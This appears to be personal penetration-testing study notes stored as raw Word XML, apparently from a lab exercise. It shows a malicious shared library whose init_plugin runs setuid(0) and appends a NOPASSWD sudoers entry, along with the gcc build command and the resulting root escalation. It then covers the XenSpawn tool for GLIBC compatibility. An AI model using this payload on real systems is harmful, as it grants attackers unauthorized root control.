    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1803400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="48" name="image46.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image46.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1144"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="18034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5B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we can manually create a C file with a malicious init_plugin function and then compile it as a .so file and put it in /home/ted/.lib since we have full permissions there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">// libsecurity.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void init_plugin() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    setuid(0); setgid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    system("echo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'charlie </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL=(ALL:ALL) NOPASSWD:ALL' &gt;&gt; /etc/sudoers");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">charlie</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your own user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -shared -fPIC -o libsecurity.so libsecurity.c -Wl,--export-dynamic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Wl,--export-dynamic → This one is a bit special.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1163"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Wl, → Passes the following options directly to the linker (ld).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1163"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--export-dynamic → Ensures that symbols from the main executable are added to the dynamic symbol table, so that they can be used by your shared object (like when using dlsym() to resolve symbols in the main binary).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In your case, it might not be strictly necessary, since your library doesn’t call back into symbols of the main program, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but it’s sometimes added for plugin compatibility</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although the standard "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -shared -o libsecurity.so -fPIC libsecurity.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" might have worked too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we run the binary with SUID and we see that our user (charlie) can now run sudo as any user!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C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5CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_459rzjy8k7qe" w:id="480"/>
      <w:bookmarkEnd w:id="480"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Everything about C (gcc, glibc, ldd, .so, -fPIC, -static)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yxc2cbrkmnvx" w:id="481"/>
      <w:bookmarkEnd w:id="481"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XenSpawn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId1145">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/X0RW3LL/XenSpawn?tab=readme-ov-file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Currently have a container already:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1291"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Container size and location on disk: 435M   /var/lib/machines/xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to rename:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="916"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo machinectl rename MACHINE_NAME xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="916"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I renamed from MACHINE_NAME to xenial since MACHINE_NAME syntax caused problems when I tried starting it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This a tool specifically made for XXXXXXXXX, but it can be used in other cases. It's made for the cases when you have GLIBC errors as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="930"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/libc.so.6: version 'GLIBC_2.34' not found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">One quick fix (as shown below) is to add the -static flag. But there are some cases where the static files are too big, or your binary needs NSS (name services like DNS, LDAP), PAM, or other plugins that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">must be dynamically linked</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then -static breaks them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, XenSpawn is a tool that creates a new environment that you can run gcc in and fix the compatibility problems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId1146">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/X0RW3LL/XenSpawn.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
